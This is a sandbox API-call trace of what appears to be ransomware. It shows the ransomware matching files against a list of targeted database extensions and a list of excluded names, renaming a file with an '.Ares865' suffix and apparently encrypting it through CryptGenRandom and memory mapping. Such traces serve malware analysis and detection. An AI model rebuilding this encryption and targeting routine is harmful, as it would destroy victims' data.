[0082.857] lstrlenW (lpString="db") returned 2 [0082.857] lstrcmpiW (lpString1="sm", lpString2="db") returned 1 [0082.857] lstrlenW (lpString="db2") returned 3 [0082.857] lstrcmpiW (lpString1="rsm", lpString2="db2") returned 1 [0082.857] lstrlenW (lpString="db3") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="db3") returned 1 [0082.858] lstrlenW (lpString="dbf") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="dbf") returned 1 [0082.858] lstrlenW (lpString="mdf") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="mdf") returned 1 [0082.858] lstrlenW (lpString="mdb") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="mdb") returned 1 [0082.858] lstrlenW (lpString="sql") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="sql") returned -1 [0082.858] lstrlenW (lpString="sqlite") returned 6 [0082.858] lstrcmpiW (lpString1="te.rsm", lpString2="sqlite") returned 1 [0082.858] lstrlenW (lpString="sqlite3") returned 7 [0082.858] lstrcmpiW (lpString1="ate.rsm", lpString2="sqlite3") returned -1 [0082.858] lstrlenW (lpString="sqlitedb") returned 8 [0082.858] lstrcmpiW (lpString1="tate.rsm", lpString2="sqlitedb") returned 1 [0082.858] lstrlenW (lpString="xml") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="xml") returned -1 [0082.858] lstrlenW (lpString="$er") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="$er") returned 1 [0082.858] lstrlenW (lpString="4dd") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="4dd") returned 1 [0082.858] lstrlenW (lpString="4dl") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="4dl") returned 1 [0082.858] lstrlenW (lpString="^^^") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="^^^") returned 1 [0082.858] lstrlenW (lpString="abs") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="abs") returned 1 [0082.858] lstrlenW (lpString="abx") returned 3 [0082.858] lstrcmpiW (lpString1="rsm", lpString2="abx") returned 1 [0082.858] lstrlenW (lpString="accdb") returned 5 [0082.858] lstrcmpiW (lpString1="e.rsm", lpString2="accdb") returned 1 [0082.858] lstrlenW (lpString="accdc") returned 5 [0082.858] lstrcmpiW (lpString1="e.rsm", lpString2="accdc") returned 1 [0082.858] lstrlenW (lpString="accde") returned 5 [0082.858] lstrcmpiW (lpString1="e.rsm", lpString2="accde") returned 1 [0082.858] lstrlenW (lpString="accdr") returned 5 [0082.858] lstrcmpiW (lpString1="e.rsm", lpString2="accdr") returned 1 [0082.858] lstrlenW (lpString="accdt") returned 5 [0082.858] lstrcmpiW (lpString1="e.rsm", lpString2="accdt") returned 1 [0082.859] lstrlenW (lpString="accdw") returned 5 [0082.859] lstrcmpiW (lpString1="e.rsm", lpString2="accdw") returned 1 [0082.859] lstrlenW (lpString="accft") returned 5 [0082.859] lstrcmpiW (lpString1="e.rsm", lpString2="accft") returned 1 [0082.859] lstrlenW (lpString="adb") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0082.859] lstrlenW (lpString="adb") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0082.859] lstrlenW (lpString="ade") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="ade") returned 1 [0082.859] lstrlenW (lpString="adf") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="adf") returned 1 [0082.859] lstrlenW (lpString="adn") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="adn") returned 1 [0082.859] lstrlenW (lpString="adp") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="adp") returned 1 [0082.859] lstrlenW (lpString="alf") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="alf") returned 1 [0082.859] lstrlenW (lpString="ask") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="ask") returned 1 [0082.859] lstrlenW (lpString="btr") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="btr") returned 1 [0082.859] lstrlenW (lpString="cat") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="cat") returned 1 [0082.859] lstrlenW (lpString="cdb") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="cdb") returned 1 [0082.859] lstrlenW (lpString="ckp") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="ckp") returned 1 [0082.859] lstrlenW (lpString="cma") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="cma") returned 1 [0082.859] lstrlenW (lpString="cpd") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="cpd") returned 1 [0082.859] lstrlenW (lpString="dacpac") returned 6 [0082.859] lstrcmpiW (lpString1="te.rsm", lpString2="dacpac") returned 1 [0082.859] lstrlenW (lpString="dad") returned 3 [0082.859] lstrcmpiW (lpString1="rsm", lpString2="dad") returned 1 [0082.859] lstrlenW (lpString="dadiagrams") returned 10 [0082.859] lstrlenW (lpString="daschema") returned 8 [0082.859] lstrcmpiW (lpString1="tate.rsm", lpString2="daschema") returned 1 [0082.860] lstrlenW (lpString="db-journal") returned 10 [0082.860] lstrlenW (lpString="db-shm") returned 6 [0082.860] lstrcmpiW (lpString1="te.rsm", lpString2="db-shm") returned 1 [0082.860] lstrlenW (lpString="db-wal") returned 6 [0082.860] lstrcmpiW (lpString1="te.rsm", lpString2="db-wal") returned 1 [0082.860] lstrlenW (lpString="dbc") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dbc") returned 1 [0082.860] lstrlenW (lpString="dbs") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dbs") returned 1 [0082.860] lstrlenW (lpString="dbt") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dbt") returned 1 [0082.860] lstrlenW (lpString="dbv") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dbv") returned 1 [0082.860] lstrlenW (lpString="dbx") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dbx") returned 1 [0082.860] lstrlenW (lpString="dcb") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dcb") returned 1 [0082.860] lstrlenW (lpString="dct") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dct") returned 1 [0082.860] lstrlenW (lpString="dcx") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dcx") returned 1 [0082.860] lstrlenW (lpString="ddl") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="ddl") returned 1 [0082.860] lstrlenW (lpString="dlis") returned 4 [0082.860] lstrcmpiW (lpString1=".rsm", lpString2="dlis") returned -1 [0082.860] lstrlenW (lpString="dp1") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dp1") returned 1 [0082.860] lstrlenW (lpString="dqy") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dqy") returned 1 [0082.860] lstrlenW (lpString="dsk") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dsk") returned 1 [0082.860] lstrlenW (lpString="dsn") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dsn") returned 1 [0082.860] lstrlenW (lpString="dtsx") returned 4 [0082.860] lstrcmpiW (lpString1=".rsm", lpString2="dtsx") returned -1 [0082.860] lstrlenW (lpString="dxl") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="dxl") returned 1 [0082.860] lstrlenW (lpString="eco") returned 3 [0082.860] lstrcmpiW (lpString1="rsm", lpString2="eco") returned 1 [0082.861] lstrlenW (lpString="ecx") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="ecx") returned 1 [0082.861] lstrlenW (lpString="edb") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="edb") returned 1 [0082.861] lstrlenW (lpString="epim") returned 4 [0082.861] lstrcmpiW (lpString1=".rsm", lpString2="epim") returned -1 [0082.861] lstrlenW (lpString="fcd") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fcd") returned 1 [0082.861] lstrlenW (lpString="fdb") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fdb") returned 1 [0082.861] lstrlenW (lpString="fic") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fic") returned 1 [0082.861] lstrlenW (lpString="flexolibrary") returned 12 [0082.861] lstrlenW (lpString="fm5") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fm5") returned 1 [0082.861] lstrlenW (lpString="fmp") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fmp") returned 1 [0082.861] lstrlenW (lpString="fmp12") returned 5 [0082.861] lstrcmpiW (lpString1="e.rsm", lpString2="fmp12") returned -1 [0082.861] lstrlenW (lpString="fmpsl") returned 5 [0082.861] lstrcmpiW (lpString1="e.rsm", lpString2="fmpsl") returned -1 [0082.861] lstrlenW (lpString="fol") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fol") returned 1 [0082.861] lstrlenW (lpString="fp3") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fp3") returned 1 [0082.861] lstrlenW (lpString="fp4") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fp4") returned 1 [0082.861] lstrlenW (lpString="fp5") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fp5") returned 1 [0082.861] lstrlenW (lpString="fp7") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fp7") returned 1 [0082.861] lstrlenW (lpString="fpt") returned 3 [0082.861] lstrcmpiW (lpString1="rsm", lpString2="fpt") returned 1 [0082.861] lstrlenW (lpString="frm") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="frm") returned 1 [0082.862] lstrlenW (lpString="gdb") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0082.862] lstrlenW (lpString="gdb") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0082.862] lstrlenW (lpString="grdb") returned 4 [0082.862] lstrcmpiW (lpString1=".rsm", lpString2="grdb") returned -1 [0082.862] lstrlenW (lpString="gwi") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="gwi") returned 1 [0082.862] lstrlenW (lpString="hdb") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="hdb") returned 1 [0082.862] lstrlenW (lpString="his") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="his") returned 1 [0082.862] lstrlenW (lpString="ib") returned 2 [0082.862] lstrcmpiW (lpString1="sm", lpString2="ib") returned 1 [0082.862] lstrlenW (lpString="idb") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="idb") returned 1 [0082.862] lstrlenW (lpString="ihx") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="ihx") returned 1 [0082.862] lstrlenW (lpString="itdb") returned 4 [0082.862] lstrcmpiW (lpString1=".rsm", lpString2="itdb") returned -1 [0082.862] lstrlenW (lpString="itw") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="itw") returned 1 [0082.862] lstrlenW (lpString="jet") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="jet") returned 1 [0082.862] lstrlenW (lpString="jtx") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="jtx") returned 1 [0082.862] lstrlenW (lpString="kdb") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="kdb") returned 1 [0082.862] lstrlenW (lpString="kexi") returned 4 [0082.862] lstrcmpiW (lpString1=".rsm", lpString2="kexi") returned -1 [0082.862] lstrlenW (lpString="kexic") returned 5 [0082.862] lstrcmpiW (lpString1="e.rsm", lpString2="kexic") returned -1 [0082.862] lstrlenW (lpString="kexis") returned 5 [0082.862] lstrcmpiW (lpString1="e.rsm", lpString2="kexis") returned -1 [0082.862] lstrlenW (lpString="lgc") returned 3 [0082.862] lstrcmpiW (lpString1="rsm", lpString2="lgc") returned 1 [0082.862] lstrlenW (lpString="lwx") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="lwx") returned 1 [0082.863] lstrlenW (lpString="maf") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="maf") returned 1 [0082.863] lstrlenW (lpString="maq") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="maq") returned 1 [0082.863] lstrlenW (lpString="mar") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mar") returned 1 [0082.863] lstrlenW (lpString="marshal") returned 7 [0082.863] lstrcmpiW (lpString1="ate.rsm", lpString2="marshal") returned -1 [0082.863] lstrlenW (lpString="mas") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mas") returned 1 [0082.863] lstrlenW (lpString="mav") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mav") returned 1 [0082.863] lstrlenW (lpString="maw") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="maw") returned 1 [0082.863] lstrlenW (lpString="mdbhtml") returned 7 [0082.863] lstrcmpiW (lpString1="ate.rsm", lpString2="mdbhtml") returned -1 [0082.863] lstrlenW (lpString="mdn") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mdn") returned 1 [0082.863] lstrlenW (lpString="mdt") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mdt") returned 1 [0082.863] lstrlenW (lpString="mfd") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mfd") returned 1 [0082.863] lstrlenW (lpString="mpd") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mpd") returned 1 [0082.863] lstrlenW (lpString="mrg") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mrg") returned 1 [0082.863] lstrlenW (lpString="mud") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mud") returned 1 [0082.863] lstrlenW (lpString="mwb") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="mwb") returned 1 [0082.863] lstrlenW (lpString="myd") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="myd") returned 1 [0082.863] lstrlenW (lpString="ndf") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="ndf") returned 1 [0082.863] lstrlenW (lpString="nnt") returned 3 [0082.863] lstrcmpiW (lpString1="rsm", lpString2="nnt") returned 1 [0082.863] lstrlenW (lpString="nrmlib") returned 6 [0082.864] lstrcmpiW (lpString1="te.rsm", lpString2="nrmlib") returned 1 [0082.864] lstrlenW (lpString="ns2") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="ns2") returned 1 [0082.864] lstrlenW (lpString="ns3") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="ns3") returned 1 [0082.864] lstrlenW (lpString="ns4") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="ns4") returned 1 [0082.864] lstrlenW (lpString="nsf") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="nsf") returned 1 [0082.864] lstrlenW (lpString="nv") returned 2 [0082.864] lstrcmpiW (lpString1="sm", lpString2="nv") returned 1 [0082.864] lstrlenW (lpString="nv2") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="nv2") returned 1 [0082.864] lstrlenW (lpString="nwdb") returned 4 [0082.864] lstrcmpiW (lpString1=".rsm", lpString2="nwdb") returned -1 [0082.864] lstrlenW (lpString="nyf") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="nyf") returned 1 [0082.864] lstrlenW (lpString="odb") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0082.864] lstrlenW (lpString="odb") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0082.864] lstrlenW (lpString="oqy") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="oqy") returned 1 [0082.864] lstrlenW (lpString="ora") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="ora") returned 1 [0082.864] lstrlenW (lpString="orx") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="orx") returned 1 [0082.864] lstrlenW (lpString="owc") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="owc") returned 1 [0082.864] lstrlenW (lpString="p96") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="p96") returned 1 [0082.864] lstrlenW (lpString="p97") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="p97") returned 1 [0082.864] lstrlenW (lpString="pan") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="pan") returned 1 [0082.864] lstrlenW (lpString="pdb") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="pdb") returned 1 [0082.864] lstrlenW (lpString="pdm") returned 3 [0082.864] lstrcmpiW (lpString1="rsm", lpString2="pdm") returned 1 [0082.865] lstrlenW (lpString="pnz") returned 3 [0082.865] lstrcmpiW (lpString1="rsm", lpString2="pnz") returned 1 [0082.865] lstrlenW (lpString="qry") returned 3 [0082.865] lstrcmpiW (lpString1="rsm", lpString2="qry") returned 1 [0082.865] lstrlenW (lpString="qvd") returned 3 [0082.865] lstrcmpiW (lpString1="rsm", lpString2="qvd") returned 1 [0082.865] lstrlenW (lpString="rbf") returned 3 [0082.865] lstrcmpiW (lpString1="rsm", lpString2="rbf") returned 1 [0082.865] lstrlenW (lpString="rctd") returned 4 [0082.865] lstrcmpiW (lpString1=".rsm", lpString2="rctd") returned -1 [0082.865] lstrlenW (lpString="rod") returned 3 [0082.865] lstrcmpiW (lpString1="rsm", lpString2="rod") returned 1 [0082.865] lstrlenW (lpString="rodx") returned 4 [0082.865] lstrcmpiW (lpString1=".rsm", lpString2="rodx") returned -1 [0082.866] lstrlenW (lpString="rpd") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="rpd") returned 1 [0082.866] lstrlenW (lpString="rsd") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="rsd") returned 1 [0082.866] lstrlenW (lpString="sas7bdat") returned 8 [0082.866] lstrcmpiW (lpString1="tate.rsm", lpString2="sas7bdat") returned 1 [0082.866] lstrlenW (lpString="sbf") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="sbf") returned -1 [0082.866] lstrlenW (lpString="scx") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="scx") returned -1 [0082.866] lstrlenW (lpString="sdb") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="sdb") returned -1 [0082.866] lstrlenW (lpString="sdc") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="sdc") returned -1 [0082.866] lstrlenW (lpString="sdf") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="sdf") returned -1 [0082.866] lstrlenW (lpString="sis") returned 3 [0082.866] lstrcmpiW (lpString1="rsm", lpString2="sis") returned -1 [0082.866] lstrlenW (lpString="spq") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="spq") returned -1 [0082.867] lstrlenW (lpString="te") returned 2 [0082.867] lstrcmpiW (lpString1="sm", lpString2="te") returned -1 [0082.867] lstrlenW (lpString="teacher") returned 7 [0082.867] lstrcmpiW (lpString1="ate.rsm", lpString2="teacher") returned -1 [0082.867] lstrlenW (lpString="tmd") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="tmd") returned -1 [0082.867] lstrlenW (lpString="tps") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="tps") returned -1 [0082.867] lstrlenW (lpString="trc") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0082.867] lstrlenW (lpString="trc") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0082.867] lstrlenW (lpString="trm") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="trm") returned -1 [0082.867] lstrlenW (lpString="udb") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="udb") returned -1 [0082.867] lstrlenW (lpString="udl") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="udl") returned -1 [0082.867] lstrlenW (lpString="usr") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="usr") returned -1 [0082.867] lstrlenW (lpString="v12") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="v12") returned -1 [0082.867] lstrlenW (lpString="vis") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="vis") returned -1 [0082.867] lstrlenW (lpString="vpd") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="vpd") returned -1 [0082.867] lstrlenW (lpString="vvv") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="vvv") returned -1 [0082.867] lstrlenW (lpString="wdb") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="wdb") returned -1 [0082.867] lstrlenW (lpString="wmdb") returned 4 [0082.867] lstrcmpiW (lpString1=".rsm", lpString2="wmdb") returned -1 [0082.867] lstrlenW (lpString="wrk") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="wrk") returned -1 [0082.867] lstrlenW (lpString="xdb") returned 3 [0082.867] lstrcmpiW (lpString1="rsm", lpString2="xdb") returned -1 [0082.867] lstrlenW (lpString="xld") returned 3 [0082.868] lstrcmpiW (lpString1="rsm", lpString2="xld") returned -1 [0082.868] lstrlenW (lpString="xmlff") returned 5 [0082.868] lstrcmpiW (lpString1="e.rsm", lpString2="xmlff") returned -1 [0082.868] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.Ares865") returned 89 [0082.868] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.ares865"), dwFlags=0x1) returned 1 [0082.869] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0082.869] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=654) returned 1 [0082.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0082.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0082.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0082.870] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0082.871] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0082.871] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.871] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x590, lpName=0x0) returned 0x15c [0082.872] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x590) returned 0x190000 [0082.873] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0082.874] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0082.874] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0082.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0082.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0082.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0082.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0082.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0082.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0082.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0082.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0082.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0082.874] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0082.874] CloseHandle (hObject=0x15c) returned 1 [0082.874] CloseHandle (hObject=0x118) returned 1 [0082.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0082.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0082.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0082.875] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="aoldtz.exe") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="..") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="windows") returned -1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="bootmgr") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="temp") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="pagefile.sys") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="boot") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="ids.txt") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="ntuser.dat") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="perflogs") returned 1 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="MSBuild") returned 1 [0082.875] lstrlenW (lpString="vcredist_x86.exe") returned 16 [0082.875] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0082.875] lstrcpyW (in: lpString1=0x2cce490, lpString2="vcredist_x86.exe" | out: lpString1="vcredist_x86.exe") returned="vcredist_x86.exe" [0082.875] lstrlenW (lpString="vcredist_x86.exe") returned 16 [0082.875] lstrlenW (lpString="Ares865") returned 7 [0082.875] lstrcmpiW (lpString1="x86.exe", lpString2="Ares865") returned 1 [0082.875] lstrlenW (lpString=".dll") returned 4 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".dll") returned 1 [0082.875] lstrlenW (lpString=".lnk") returned 4 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".lnk") returned 1 [0082.875] lstrlenW (lpString=".ini") returned 4 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".ini") returned 1 [0082.875] lstrlenW (lpString=".sys") returned 4 [0082.875] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".sys") returned 1 [0082.875] lstrlenW 